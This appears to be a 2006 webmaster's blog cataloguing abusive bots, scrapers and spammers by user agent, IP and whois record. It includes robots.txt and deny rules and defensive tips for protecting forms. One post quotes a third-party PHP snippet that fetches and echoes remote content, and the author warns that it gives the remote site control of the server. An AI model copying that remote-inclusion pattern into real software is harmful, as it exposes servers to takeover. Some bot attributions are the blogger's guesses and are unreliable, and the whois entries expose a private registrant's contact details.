Dec 23, 2006

praguomi/5.0 spam bot

praguomi/5.0 (http://somespam; u; http://same spam; http://spam; rv:1.7.12) gecko/20050915 firefox/
80.227.0.153

This bot tries to write spam links into your useragent stats.

Dec 18, 2006

mozilla/5.0 (000000000; User agent all Zeros

mozilla/5.0 (000000000; 0; 000 000 00 0; 00) 0000000000000000000 0000000 0000 000000 000000000000
84.176.234.188 p54B0EABC.dip.t-dialin.net


Anyone else seen this?

Is this some strange bot, or is someone's proxy changing all the letters to zeros?

plano.mcafee.com Is this a bot?

mozilla/4.0 (compatible; msie 7.0; windows nt 5.2; .net clr 1.1.4322; .net clr 2.0.50727)
All Hits From plano.mcafee.com 205.227.137.1


So is this a bot? If so, what's it doing?




[IPv4 whois information for 205.227.137.1 ]
[whois.arin.net]
OrgName: Level 3 Communications, Inc.
OrgID: LVLT
Address: 1025 Eldorado Blvd.
City: Broomfield
StateProv: CO
PostalCode: 80021
Country: US

depspid/5.07; +http://about.depspid.net) abuse

mozilla/4.0 (compatible; depspid/5.07; +http://about.depspid.net)
70.109.76.129 pool-70-109-76-129.hag.east.verizon.net

This bot doesn't take no for an answer. It hammers pages over and over when it gets an error.

The website is another startup. The only hits we have seen are from hag.east.verizon.net.

Both this IP and the bot have been banned.

Dec 17, 2006

Do you have a robots problem?

The scale of the robots problem largely depends on the type of website as well as the type of content it offers. The following pointers are consistent with robot activity.

· Large numbers of requests from a single IP address or a range of IP addresses within the same subnet (i.e. the first three numbers of the IP address are identical).

· Large numbers of requests for database driven content compared to the rest of the website.

· Many requests made from browsers that do not support ASP Sessions.

· Lots of and increasing numbers of website visitors, but no corresponding increase in transactions (e.g. sales!).

· Large numbers of spam or automated requests being generated from online forms.
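
The first pointer in the list above (many requests from one address or from one subnet) is easy to check against a log. The following is a minimal Python sketch, assuming the client IPs have already been pulled out of the access log into a list. The function names and the threshold are made up for illustration, and the sample addresses come from the keymachine.de entry elsewhere on this page.

```python
from collections import Counter

def subnet_of(ip):
    """Return the first three numbers of a dotted IPv4 address, e.g. '62.141.52'."""
    return ".".join(ip.split(".")[:3])

def busy_subnets(ips, threshold):
    """Return {subnet: hits} for every subnet with at least `threshold` requests."""
    counts = Counter(subnet_of(ip) for ip in ips)
    return {net: n for net, n in counts.items() if n >= threshold}

# Sample addresses from the keymachine.de entry; the threshold is arbitrary.
hits = ["62.141.52.139", "62.141.52.139", "87.118.103.185", "87.118.106.4"]
print(busy_subnets(hits, threshold=2))
```

A real threshold depends on normal traffic for the site, so it is worth trying a few values against a day of logs before banning anything.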

See full story here.

Windows Live caught ignoring robots.txt

For almost a year I have banned robots from indexing cgi-bin files, yet Windows Live is still showing links to my banner rotation software, complete with a cache.

This is a direct violation of the robots.txt standard.


Also, as in the last post, the formatting of the Windows Live search results is confusing users. Only the title is hot linked and the URL is not, which makes it very inviting to click on the cache link.

Dec 15, 2006

Windows Live Cache abuse confusion

I am starting to see newbie users trying to surf sites through the Windows Live cache instead of the website links.

They try to submit orders and use the site through the cache, and it gets detected as trackback spam due to the unusual referrer.

When I tried to warn the users to come to my website to use it, I discovered that they cannot tell my website from the Windows Live cache, due to the poor formatting of the Windows Live screens and links. They have no idea what they are doing or what the problem is.

I never had this problem with Google, most likely because its cache link is a smaller-font link above the website link. The only solution I can see is to not allow MSN to cache.

META NAME="msnbot" CONTENT="nocache"

It ignores the private cache command.
META HTTP-EQUIV="CACHE-CONTROL" CONTENT="PRIVATE"

Dec 10, 2006

EBAY Bot what is it doing?

mozilla/5.0 (windows; u; windows nt 5.0; en-us; rv:1.8.0.7) gecko/20060909 firefox/1.5.0.7
216.113.181.67


I have been watching this bot. It hits 3 of my incoming pages every few days and gets an error, but it keeps trying every few days.

Perhaps this thing is scraping our sites to see what content we have and then using those keywords for Google advertising.

Or perhaps it's looking for people saying bad things about eBay and PayPal, like
paypalwarning.com
paypalsucks.com
ebaysucks.com/

yoono.com new bot

mozilla/5.0 (compatible; yoono; http://www.yoono.com/)
193.110.140.148

This site has a bookmark sharing service, and it's not clear what this bot is doing.
It might be attempting to verify the links.

Anyway, it's a new bot that hit here this week.

Dec 8, 2006

Nedstat goes nuts. Sets cookie FRQSTR on your domain.

A lot of us have used Nedstat since the 90s. I just started seeing cookies coming from my domain that my software was not setting, and discovered that Nedstat got bought out and is inserting popups on some websites.

The site has found out some way to set the following cookies on your domain.

FRQSTR=
WIDYMD=
KIDYMD=
It's not clear if they can read back a cookie from your domain. I don't think they can; it may just be a bug. I don't know, but if you have any Nedstat code on your sites you need to remove it, because something strange is going on.

Here is how to add a link on your site to display all the cookies your site has set.

Display this site's cookies

You create this by making a link to:
javascript:alert(document.cookie);

voilabot abuse

mozilla/4.0 (compatible; msie 5.0; windows 95) voilabot beta 1.2 (http://www.voila.com/)
81.52.143.15 natcrawlbloc01.net.m1.fti.net

This bot has been in my ban list and robots.txt reject list for some time, but it won't go away. It ignores robots.txt, and it ignores the errors it gets when it tries to load pages.

Adding it to the deny ip list.

deny from 81.52.143.15

Dec 5, 2006

outboundrequest.com abuse

POE-Component-Client-HTTP/0.65 (perl; N; POE; en; rv:0.650000)
64.239.7.216 ns2.outboundrequest.com
POE-Component-Client-HTTP/0.65 (perl; N; POE; en; rv:0.650000)
64.65.13.36 garnet.il.outboundrequest.com


This is a known bad useragent, and outboundrequest.com is a real domain with no website. Update: the bots changed IPs.

OrgName: Interland, Inc.
OrgID: INTD
Address: 101 Marietta Street
City: Atlanta
StateProv: GA
PostalCode: 30039
Country: US


Added to domain ban

outboundrequest.com,Abusive bots

stage1.answers.com bot

mozilla/4.0 (compatible; msie 5.5; windows nt 5.0)
64.34.176.218 stage1.answers.com


This must be a bot from answers.com; however, it's using a fake useragent.

Since Answers has nothing on its site about running a bot, it's blocked.

twiceler Experimental bot

twiceler www.cuill.com/twiceler/robot.html
64.62.136.205


Hurricane Electric
OrgID: HURC
Address: 760 Mission Court
City: Fremont
StateProv: CA
PostalCode: 94539
Country: US

This bot just cannot take no for an answer. It keeps trying to scan my site.

Says it will respond to
User-agent: cuill
Disallow: /

in robots.txt, so I am going to try that.

mozilla/0.6 beta (windows) is a bot

mozilla/0.6 beta (windows)
66.36.229.205

This useragent has been verified as a bot.

It was originally Netscape, from before tables were supported, and no one would be using that browser anymore.

Dec 3, 2006

crlptp01 = Colgate University fake domain name

mozilla/5.0 (macintosh; u; ppc mac os x; en) applewebkit/418.9.1 (khtml- like gecko) safari/419.3
crlptp01 149.43.116.39

Colgate University
OrgID: COLGAT-2
Address: 13 Oak Drive
City: Hamilton
StateProv: NY
PostalCode: 13346
Country: US

Why would Colgate Univ have a fake domain connected to one of its IPs?

nslookup 149.43.116.39
Canonical name: crlptp01
Aliases: dfbnt351

Dec 1, 2006

Block list updated 11-30-06

Block list has been updated.
Click on update link

OK, to use this you need M&M Autoban installed. Docs are in the zip file.

Or you can use the data in your own scripts.

Nov 30, 2006

; Windows NT; ....../1.0 What is this

Mozilla/4.0 (compatible; MSIE 4.0; Windows NT; ....../1.0 )
63.80.56.36

Another fake browser detected.


OrgName: UUNET Technologies, Inc.
OrgID: UU
Address: 22001 Loudoun County Parkway
City: Ashburn
StateProv: VA
PostalCode: 20147
Country: US

Nov 29, 2006

christiandnsonline.com

NO AGENT-
72.36.205.10 sql3.christiandnsonline.com

Not sure what this one is

Nov 28, 2006

anothrrobot (http://www.anothr.com) RSS ABUSE

anothrrobot (http://www.anothr.com)
60.191.17.90

The above IP is banned as a single-stage open SMTP relay or HTTP proxy. See here.

anothrrobot (http://www.anothr.com)
218.72.35.200 200.35.72.218.broad.hz.zj.dynamic.163data.com.cn

The above IP is also banned as a spammer. See here.

Located in Shanghai, China.

This RSS robot is said to read your RSS feeds and then push them to the end user. But it keeps on reloading the RSS feed over and over and over.

Example of abuse: I set my RSS feed Time To Live (TTL) to no more than 1 load per day, but this bot is loading the feed every minute and ignoring the TTL.
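
The kind of TTL abuse described above can be measured from the feed's request times. This is only a sketch: it assumes the fetch times for one client are already available as plain seconds, and the function name and sample timestamps are hypothetical.

```python
def polls_ignoring_ttl(fetch_times, ttl_seconds):
    """Count fetches that arrive sooner than ttl_seconds after the previous fetch."""
    ordered = sorted(fetch_times)
    return sum(1 for prev, cur in zip(ordered, ordered[1:]) if cur - prev < ttl_seconds)

ONE_DAY = 24 * 60 * 60
# Hypothetical timestamps in seconds: one request per minute for five minutes.
fetches = [0, 60, 120, 180, 240]
print(polls_ignoring_ttl(fetches, ONE_DAY))
```

A well-behaved reader should score zero or close to it, so any client with a large count is a candidate for the ban list.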

So it's banned.
After banning, I am seeing hits from another dynamic China IP address. I don't think this is a real feed service.

Domain name: anothr.com

Registrant Contact:
Zheng
Zheng XY cnblog@gmail.com
13501863736 fax: 13501863736
15L,Huamin Building, No.728,Yanan Xi Rd.
Shanghai ShangHai 200051
CN

Administrative Contact:
Zheng XY cnblog@gmail.com
13501863736 fax: 13501863736
15L,Huamin Building, No.728,Yanan Xi Rd.
Shanghai ShangHai 200051
CN

Technical Contact:
Product Team diy@corp.myrice.com
64677272 fax: 64727880
Room 306,MingYuan Tower,1199 Fu Xing Road (M)
Shanghai Shanghai 200031
CN

Billing Contact:
Product Team diy@corp.myrice.com
64677272 fax: 64727880
Room 306,MingYuan Tower,1199 Fu Xing Road (M)
Shanghai Shanghai 200031
CN

DNS:
ns.myricedns.com
ns5.cnmsn.net

Created: 2006-03-16
Expires: 2008-03-16

outfoxbot/0.5

outfoxbot/0.5 (for internet experiments; http://; outfoxbot@gmail.com)
All Hits From 60.191.80.48

This bot runs on an IP banned for sending out China spam.

It is an unknown bot, likely an email harvester.

Nov 26, 2006

keymachine.de abuse probes

mozilla/4.0 (compatible; msie 6.0; windows nt 5.2; win64; amd64)
87.118.103.185 ns2.km20935-07.keymachine.de

Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
84.19.188.68 ns.km21901-01.keymachine.de

I show this useragent only being used by keymachine.de not users.
mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; avant browser [avantbrowser.com]; hotbar 4.4.5.0)
62.141.52.139 ns.km23144-19.keymachine.de

I show this useragent only being used by keymachine.de not users.

mozilla/5.0 (windows; u; windows nt 5.0; en-us; rv:1.7.5) gecko/20050207 firefox/1.0.1
62.141.52.139 ns.km23144-19.keymachine.de

87.118.106.4 ns.km23108-04.keymachine.de



keymachine.de is at it again. It goes straight to my contact form, then back to the homepage, then back to the contact form.

A few minutes later it shows up on one of my PHP-Nuke sites trying to load a module that I do not run. After 14 tries it gave up and started on the homepage. After 6 tries it gave up on the homepage.

keymachine.de should be banned from all sites.



Listed in rfc-ignorant.org

Nov 25, 2006

converacrawler/0.9d 7-9745.san2.attens.net bot

converacrawler/0.9d (+http://www.authoritativeweb.com/crawl)
63.241.61.7 7-9745.san2.attens.net

This bot came in and refused to take no for an answer. It tried to load every page I had. So it's clear that it didn't spider my site to get those links; it got them from Google or somewhere else.

converacrawler was originally banned as an email harvester, but it now looks like a real search site at www.govmine.com.

They claim you can add this to robots.txt.

User-agent: ConveraCrawler
Disallow: /

Nov 24, 2006

www.exalead.com Violates robots.txt

The www.exalead.com website has a robot that comes in, ignores your robots.txt file, takes a snapshot of your website, and then posts it as a thumbnail on its site.
It doesn't matter if you block all images from bots like this.

User-agent: *
Disallow: /images/

Exalead.com refuses to abide by the commands in robots.txt.

abuse from thenewpush.com

Mozilla/4.0 compatible
64.92.199.43 host-64-92-199-43.thenewpush.com
Mozilla/4.0
64.92.199.42 host-64-92-199-42.thenewpush.com

64.92.199.60 host-64-92-199-60.thenewpush.com

Ran into this probe today from several IPs on thenewpush.com. Looks like they were testing out useragents on different IPs.

Nov 23, 2006

66.199.236.106 duns.dunnaonline.com spammer

mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)
66.199.236.106 duns.dunnaonline.com
mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)

dunnaonline.com is the leading provider for data for direct marketing campaings


Hmm, why would a direct marketer be sending out a bot that fakes Google and attempts to post spam into our scripts?

It looks like this is a spammer site and they are getting into blog spam?
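
A fake Googlebot like this one can be told apart from the real crawler with a reverse DNS lookup followed by a forward lookup, which is the check Google itself recommends. Below is a minimal Python sketch of that check. The function name is made up, and the two lookup parameters exist only so the logic can be tried without touching the network; by default it uses the standard `socket` calls.

```python
import socket

def is_real_googlebot(ip, reverse=None, forward=None):
    """Reverse-resolve ip, check the domain, then confirm the name resolves back to ip."""
    reverse = reverse or (lambda addr: socket.gethostbyaddr(addr)[0])
    forward = forward or (lambda name: socket.gethostbyname_ex(name)[2])
    try:
        host = reverse(ip).lower().rstrip(".")
    except OSError:
        return False  # no reverse DNS record at all
    if not host.endswith((".googlebot.com", ".google.com")):
        return False  # resolves to someone else's domain
    try:
        return ip in forward(host)
    except OSError:
        return False

# Stubbed lookup using the hostname logged for this visitor.
print(is_real_googlebot("66.199.236.106",
                        reverse=lambda addr: "duns.dunnaonline.com",
                        forward=lambda name: []))
```

The forward lookup matters because anyone who controls their own reverse DNS can make an address claim to be a Google hostname.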

The website won't load, but a cache is still stored in Google.

Update: this bot keeps trying scripts that don't exist.

PHP-Nuke Attacker Bots

I have been seeing a lot of bots hitting my PHP-Nuke sites. It's not clear why they are trying to load the following files, since they are not used in the current version and have never been located on my server.

The files they are attempting to post to are
logon.php
profile.php
posting.php

I have set up an autoban on these files to track the attacks. Here will be the results of what I find.

It's now clear what this is: an attack on the phpBB forum software that PHP-Nuke uses. The problem is that this version is modified, so the attack won't work on PHP-Nuke. But that doesn't stop the robots' attacks.

IPs of phpBB hackers

66.199.236.106 duns.dunnaonline.com <- worst abuser
213.186.116.169 utel10.in.ua
84.252.152.169 poltawa.com
75.126.18.154 server1.domishko.ru
81.177.24.80
81.177.4.43
66.230.154.154
66.230.161.122
222.33.248.126

Nov 22, 2006

Exalead image theft

Exalead snapshots your site and lists it in its search system. It also tries to hot link all your images in a page view window. Sites like mine using hotlink protection will display an image theft notice when they do this.

I thought I had stopped this snapshot bot without stopping its crawler, but they have again changed the useragent for it.

See here and here for more.

block useragents.

NG/2.0,Image crawler
NG/4.0,image crawler

The robot does not comply with even basic robots.txt commands to not load images.

User-agent: *
Disallow: /images/

Nov 21, 2006

nodomaintransfer abuse nodomaintransfer27.com is back

66.135.34.11 nodomaintransfer18.com
66.139.75.163 nodomaintransfer19.com
66.139.76.245 nodomaintransfer21.com
66.139.77.214 nodomaintransfer22.com
66.135.33.49 nodomaintransfer25.com
64.34.166.88 nodomaintransfer27.com


It shows up as a domain nodomaintransfer??.com, with the ?? replaced by a number. This is a guestbook spammer.

It is now suspected that they are registering throwaway domains so that when they get caught they can just switch to a new one. I have seen the ones above; if you have seen other combos, please post them.


On another note, it's odd that we also see Singapore peepsurf running a proxy on
nodomaintransfer21.com, now suspected to be connected.

domain ban
nodomaintransfer,Guestbook Spammer
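
For anyone using the ban data in their own scripts, the "pattern,reason" lines above can be applied with a few lines of Python. This is a sketch under assumptions: it treats each pattern as a plain substring of the visitor's hostname, which may not be how M&M Autoban itself matches, and the function names are hypothetical.

```python
def load_bans(lines):
    """Parse 'pattern,reason' lines into a list of (pattern, reason) pairs."""
    bans = []
    for line in lines:
        pattern, _, reason = line.partition(",")
        if pattern.strip():
            bans.append((pattern.strip().lower(), reason.strip()))
    return bans

def ban_reason(hostname, bans):
    """Return the reason for the first pattern found in hostname, else None."""
    host = hostname.lower()
    for pattern, reason in bans:
        if pattern in host:
            return reason
    return None

bans = load_bans(["nodomaintransfer,Guestbook Spammer", "outboundrequest.com,Abusive bots"])
print(ban_reason("nodomaintransfer27.com", bans))
print(ban_reason("ns2.outboundrequest.com", bans))
```

Matching on the partial name is what lets a single entry cover every numbered throwaway domain.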

sumitbot_hansrajbot RufusBot Submit Bot spammer

sumitbot_hansrajbot (sumitbot_hansrajbot; http://64.124.122.252/feedback.html)
64.124.122.228.gw.xigs.net 64.124.122.228

IP has been flagged as a spammer. Also see SPAMBAG on 64.124.122.228

RufusBot
Why are we crawling?
We crawl the web towards the goal of developing a new kind of index/search tool that will bring substantial and previously unavailable exposure to websites. We're in "stealth mode" for the next few months for business reasons, but watch this page for more details on our product.


Yeah, same old story. But if it's true, why don't you have a real domain name, and why are you running on an IP flagged as a source of spam? Get a real hosting account with a real domain and someone might believe you.

We identify ourselves with the name RufusBot in our crawls

The code below can be used to disallow access to all parts of your site just for our bot.
User-Agent: RufusBot
Disallow: /


Sorry, that statement is false. It identifies itself as The Submit Bot in crawls. Submitting what? Spam?


It's not clear what gw.xigs.net is. Is it an ISP or a hosting company?

scspider/0.2 64.28.178.66

scspider/0.2
64.28.178.66

This bot is using an IP flagged as a spammer. This unknown bot is banned.

blogbot/1.0 Locus.CS.UCLA.EDU 131.179.64.248

blogbot/1.0 (ucla cs dept contact:kcsia@cs.ucla.edu)
All Hits From Locus.CS.UCLA.EDU 131.179.64.248

It is unknown what this bot is for, so it's banned.

webbot.org www.webbot.ru webbot/0.1

mozilla/5.0 (compatible; webbot/0.1; http://www.webbot.ru/bot.html)
88.151.114.38 crawler38.us.webbot.org
88.151.114.36 crawler36.us.webbot.org


This bot fell right into bot traps and then kept trying to spider all my sites.

It is a .ru robot.

Banned due to abuse: not following robots.txt.

Nov 17, 2006

72.20.99.48 c08.ba.accelovation.com www.accelobot.com scraper

400 Required header 'Accept' missing
Mozilla/5.0 (compatible; heritrix/1.8.0 +http://www.accelobot.com)
72.20.99.48 c08.ba.accelovation.com

My mission is helping companies mine the online world. I seek innovators like you, who provide insights into unmet needs, trends, and market activity. Using Accelovation Market Discovery™ software (MDS), I help automate market research, allowing companies to more effectively and economically identify and take advantage of new opportunities for innovation and growth.


This bot was caught hammering my site and getting blocked on all PHP pages by BB (Bad Behavior).
I recommend adding this robot to your robots.txt file.

Case Studies
Major consumer packaged goods companies use Accelovation to identify new innovations that will become their next billion dollar businesses.
Multiple Fortune 500 chemical companies use Accelovation to discover new markets for existing capabilities, while keeping tabs on the competition.
A Fortune 100 telecommunications company identifies patent infringers to win multi-million dollar awards via automated Accelovation searches.


Really? Stealing my content so some big company can make money off of it is theft.
Helping big companies find ideas that they can take from us and patent is theft.
And worse yet, once they take your ideas and patent them, they come back and sue you for patent theft.

BANNED.

Nov 10, 2006

Running getmyarticles.com remote scripts

elseif(intval(get_cfg_var('allow_url_fopen')) && function_exists('file')) {
if($content = @file("http://getmyarticles.com/engine.php?".$QueryString))
echo @join('', $content);
}
elseif(function_exists('curl_init')) {
$ch = curl_init ("http://getmyarticles.com/engine.php?".$QueryString);
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_exec ($ch);


Take care. The site getmyarticles.com will not answer my questions about the security problems.

Beware of the PHP script provided by getmyarticles.com that they want you to put on your server. It allows them to take total control of your server. Instead of pulling content and displaying it on your server, it loads the script from the remote server and then runs it.

This is a huge security violation. They can spam from your server, run bots, or do anything they want. They will control your server.

Until they release a real script that just prints the content to the screen so it cannot be executed, or answer emails about why they won't change it, do not use that service.




More testing on this shows that the remote content can be loaded and then scanned for any PHP code before it's displayed, but you will have to write your own script to do this. If anyone else wants to help test some safe scripts using this service, let me know. We need to make sure we know all the exploits we need to scan for.
Scanning for
should prevent any PHP code from running. Any more ideas?
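
One way to make sure fetched content is only ever printed, never run, is to escape it before display instead of hunting for specific tokens. The Python sketch below shows that idea; it is a swapped-in approach rather than the scan described above, the function name is hypothetical, and the sample string is invented for the demonstration.

```python
import html

def render_remote_text(remote_content):
    """Escape markup so fetched text is shown literally and never interpreted."""
    return html.escape(remote_content)

# Invented sample: remote content that tries to smuggle in a code block.
sample = "<?php system('id'); ?>Hello"
print(render_remote_text(sample))
```

The trade-off is that legitimate HTML formatting in the articles is escaped too, so this suits plain-text content best.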

Nov 9, 2006

Website Contact form: How the robots attack

If you have a website you likely have a contact form so you do not have to list your email address.

The rise of blogs has also created roving spambots that post to comment forms. They are attempting to find blogs and guestbooks, but they are also posting to our website contact forms.

Here is an example of a robot that came from
70.87.63.146 92.3f.5746.static.theplanet.com

The robot read the form from my HTML page and copied all the form fields, including the hidden ones. It then submitted all the proper fields, leaving the ones not used blank. It added data to the name and city.

The city field contained 'k o s t a n a y' (spaces added). The name contained a random name. It is believed that this was a test message designed to post to everything, and then come back a month later and scan Google to find out which sites end up displaying the test phrase, which in this case is the city.

Once it finds out which sites it got into it will then come back and post its spam message.

The strange thing about this robot is that it has a bug. It doesn't understand your reset or clear button, so it tries to submit that field also, like this:
reset=Reset form

So if you find your reset field being posted to your form, you should reject the entry.
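
That rejection rule takes only a few lines. The sketch below is Python rather than PHP and assumes the posted fields arrive as a dictionary; the function name and the default button name are illustrative and should match whatever the form's reset button is actually called.

```python
def looks_like_form_bot(posted_fields, button_names=("reset",)):
    """Return True if the POST data contains a field named after a reset/clear button."""
    return any(name.lower() in button_names for name in posted_fields)

# A browser never sends the reset button, so its presence gives the robot away.
print(looks_like_form_bot({"name": "x", "city": "y", "reset": "Reset form"}))
```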

Posting a key field or password field won't help, because it will read the field and repost it. However, after detecting this bot I changed my key and found that it's still trying to post under the old key, so it reads your key once and then doesn't do any updates.

In order to protect your forms from this bot, I recommend using PHP to create your form page and then posting the current date as a hidden field along with a rotating key. Then test for these when the data is submitted. This type of bot may pass the first test but none of the ones after that. In fact, it may not even pass the first test if it doesn't post on the same day it scans.
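
The date-plus-key idea can be sketched as follows. The example is in Python rather than PHP, and it makes one specific assumption that is not in the post: the key is derived from the date with an HMAC over a server-side secret, so the server never has to store issued keys. The secret value and function names are hypothetical.

```python
import hashlib
import hmac
from datetime import date

SECRET = b"change-me"  # hypothetical server-side secret, rotated by the site owner

def make_token(day, secret=SECRET):
    """Derive the hidden-field key for a given date."""
    return hmac.new(secret, day.isoformat().encode(), hashlib.sha256).hexdigest()

def token_is_valid(posted_day, posted_token, today, secret=SECRET):
    """Accept only a token that was issued today with the current secret."""
    if posted_day != today.isoformat():
        return False
    expected = make_token(today, secret)
    return hmac.compare_digest(posted_token.encode(), expected.encode())

issued = date(2006, 11, 9)
token = make_token(issued)
print(token_is_valid("2006-11-09", token, issued))             # posted the same day
print(token_is_valid("2006-11-09", token, date(2006, 12, 9)))  # replayed a month later
```

A form loaded just before midnight and submitted just after would be rejected by this sketch, so a real version might also accept the previous day's token.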


For my forms that are on HTML pages I have changed my PHP submission form. It now displays a page asking the user to press submit again to verify the post. This inserts another date and key code in the input that the robots cannot duplicate. Not only do they not know what the key will be ahead of time, but they would have to submit the data twice with different keys to get in, something they are not programmed to do.

The verify button takes the place of the CAPTCHA and works just as well so far.

Nov 8, 2006

Google IP 72.14.194.33 Falls into bot traps

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; .net clr 1.1.4322)
72.14.194.33

This IP is owned by Google and is used by Google Web Accelerator.

The problem is that Google is not following the robots.txt file, so it's falling into bot traps.

Or, if it's not Google Web Accelerator falling into traps, then people are using the IP as a proxy.


Question is what to do about this?

Nov 7, 2006

83.206.210.131 billythekid.ivelem.net

403 A User-Agent is required but none was provided
83.206.210.131 billythekid.ivelem.net

This one also has no useragent. Not sure what it's doing.
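
The two header rejections that show up in these logs (no User-Agent, no Accept) can be illustrated with a small check. This Python sketch is not Bad Behavior's actual code; it only mimics the two messages quoted on this page, and the function name is hypothetical.

```python
def check_headers(headers):
    """Return (status, reason) for a dict of request headers, or (200, 'ok')."""
    names = {name.lower(): value for name, value in headers.items()}
    if not names.get("user-agent", "").strip():
        return 403, "A User-Agent is required but none was provided"
    if "accept" not in names:
        return 400, "Required header 'Accept' missing"
    return 200, "ok"

print(check_headers({"Host": "example.com"}))
print(check_headers({"User-Agent": "Mozilla/5.0 (compatible; heritrix/1.8.0)"}))
```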

render-dream.com

bad-behavior 403 A User-Agent is required but none was provided
211.218.151.198
85.214.32.180 render-dream.com

These 2 came in at the same time and are the same bot from 2 IPs.

It's not clear what render-dream.com is. The website gives an error and I can find no record in Google.

Nov 6, 2006

38.113.234.180 crawl1.cosmixcorp.com

cosmixcorp.com is a health search system

cfetch/1.0
38.113.234.180 crawl1.cosmixcorp.com

voyager/1.0
38.113.234.180 crawl1.cosmixcorp.com

They have started changing useragents lately. The site says its using the Voyager useragent.
What is your crawler's HTTP user-agent string?

voyager/1.0


That's really strange, since it keeps using cfetch/1.0 most of the time.
I had been banning them by IP but will try the robots file again.


Add this to robots.txt
User-agent: voyager
Disallow: /
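
The mismatch between the two useragents matters for this rule. As a rough illustration, Python's standard `urllib.robotparser` can show how one common matching implementation reads the two lines above. How the crawler itself matches the rule is unknown, so this is only an approximation.

```python
from urllib.robotparser import RobotFileParser

rules = RobotFileParser()
rules.parse([
    "User-agent: voyager",
    "Disallow: /",
])

# The rule names "voyager", so a request identifying as cfetch is not covered by it.
print(rules.can_fetch("voyager/1.0", "/index.html"))
print(rules.can_fetch("cfetch/1.0", "/index.html"))
```

If the crawler keeps arriving as cfetch, a second record for that name (or a ban by IP) is probably still needed.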

tm.net.my

60.48.201.70 tm.net.my

This is an ISP, Telekom Malaysia. It creates a lot of guestbook spam and we had banned it. It will be unbanned as an experiment to see what we get.

Jakarta Commons

See the last post. This one came in using Jakarta Commons and was blocked by BB, so they started changing IPs, I guess thinking I was blocking them by IP?

Here is a list. The first one had a longer useragent.

Jakarta Commons-HttpClient/3.0.1 UP.Link/6.2.3.21.0
12.25.203.39 babylon.openwave.com

Jakarta Commons-HttpClient/3.0.1
203.144.144.164 proxy.asianet.co.th
203.187.16.218 u16-218.u203-187.giga.net.tw
80.50.82.90
203.144.144.164 proxy.asianet.co.th
203.187.16.218 u16-218.u203-187.giga.net.tw
80.248.8.43
85.46.232.188 host188-232-static.46-85-b.business.telecomitalia.it
213.91.192.5 5_192.btc-net.bg
203.144.144.164 proxy.asianet.co.th
209.203.227.139 exchange.soundcontainer.com
217.40.239.201 host217-40-239-201.in-addr.btopenworld.com
203.187.16.218 u16-218.u203-187.giga.net.tw
203.187.16.218 u16-218.u203-187.giga.net.tw
80.237.140.233 proxy77.net
202.158.165.82
211.218.151.198
222.243.204.210
218.98.221.108
80.76.55.21

Still coming; IP list updated.

It kind of looks like either he has accounts on all of these, or the computers are compromised, or they are some type of proxy...
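
The pattern in this post, one useragent arriving from a long list of unrelated addresses, can be picked out of a log with a small grouping pass. The Python sketch below assumes the log has already been reduced to (useragent, ip) pairs; the function name and threshold are hypothetical, and the sample rows are taken from the list above.

```python
from collections import defaultdict

def agents_seen_from_many_ips(hits, min_ips):
    """hits is an iterable of (useragent, ip); return agents used by >= min_ips addresses."""
    ips_by_agent = defaultdict(set)
    for agent, ip in hits:
        ips_by_agent[agent].add(ip)
    return {agent: len(ips) for agent, ips in ips_by_agent.items() if len(ips) >= min_ips}

hits = [
    ("Jakarta Commons-HttpClient/3.0.1", "203.144.144.164"),
    ("Jakarta Commons-HttpClient/3.0.1", "203.187.16.218"),
    ("Jakarta Commons-HttpClient/3.0.1", "80.50.82.90"),
    ("Jakarta Commons-HttpClient/3.0.1", "203.144.144.164"),
]
print(agents_seen_from_many_ips(hits, min_ips=3))
```

Common browser useragents will also show up from many addresses, so this is most useful for rare strings like a library's default useragent.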

400 Header 'Connection' contains invalid values

400 Header 'Connection' contains invalid values
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.73.184.24 84-73-184-24.dclient.hispeed.ch

This bot or hacker (I don't know which) hit my site and was stopped by BB.
So it started changing IPs while still using the same useragent and headers. What's strange is all the IPs it's using.

Here is a list.

84.5.129.72
68.56.7.53 c-68-56-7-53.hsd1.fl.comcast.net
12.227.189.4 12-227-189-4.client.mchsi.com
72.56.124.102 CPE0011e6ee1575-CM0011e6ee1574.cpe.net.cable.rogers.com
84.156.107.136 p549C6B88.dip.t-dialin.net
217.249.174.68 pD9F9AE44.dip.t-dialin.net
62.178.171.33 chello062178171033.5.12.vie.surfer.at
83.184.189.61 d83-184-189-61.cust.tele2.it

Also see next post about similar action using useragent 'Jakarta Commons'

Nov 3, 2006

84.244.8.86 pejantantangguh-a.biz

84.244.8.86 pejantantangguh-a.biz
SE - Sweden
What kind of domain is this?
Its website is blank and its robot visits with no useragent.

tmhaos04.imsbiz.com

mozilla/4.0 (compatible; msie 5.01; windows nt)
210.87.251.107 tmhaos04.imsbiz.com

This one is a spammer; the IP is on the spam blocklist.

What gave him away is the windows nt useragent. This is invalid.
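
The rule used here, a "windows nt" token with no version number after it, can be expressed as a regular expression. This Python sketch only encodes the heuristic from this post. Whether every genuine browser always included a version is an assumption taken from the post, so a match is better treated as a hint than as proof.

```python
import re

# "windows nt" followed directly by ";" or ")" instead of a version number.
BARE_WINDOWS_NT = re.compile(r"windows nt\s*[;)]", re.IGNORECASE)

def has_bare_windows_nt(useragent):
    """Return True if the useragent names Windows NT without a version."""
    return bool(BARE_WINDOWS_NT.search(useragent))

print(has_bare_windows_nt("mozilla/4.0 (compatible; msie 5.01; windows nt)"))
print(has_bare_windows_nt("mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)"))
```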

s7.buzzlogic.com

Posted: October 31 2006 Post subject: suspicious link in my stats
--------------------------------------------------------------------------------

Does anybody have a clue what this is? I've had it show up three times now. Obviously, the entry link and exit link have nothing to do with my site.

Here is the stat info

2
October 31st 2006 16:42:51
7 seconds
Konqueror 3.5
Linux
1600x1200 Returning Visits:

Referring URL: 0
Location: Florida, Miami, United States
host name:s7.buzzlogic.com (64.34.246.44)
No referring link



A check on this site, buzzlogic, shows that it's a snoop bot for corporations to check on who is talking about them. Another snoop bot.

Oct 27, 2006

php version tracker

php version tracker (http://www.nexen.net/phpversion/bot.php)
tabarnak.nexen.net 217.174.203.41

PHP version tracker runs continuously. It doesn't request anything more than HEAD from the web site (i.e., http://www.nexen.net/, GET /), and do not recurse into folders. It runs from differents IP, which are not stable.



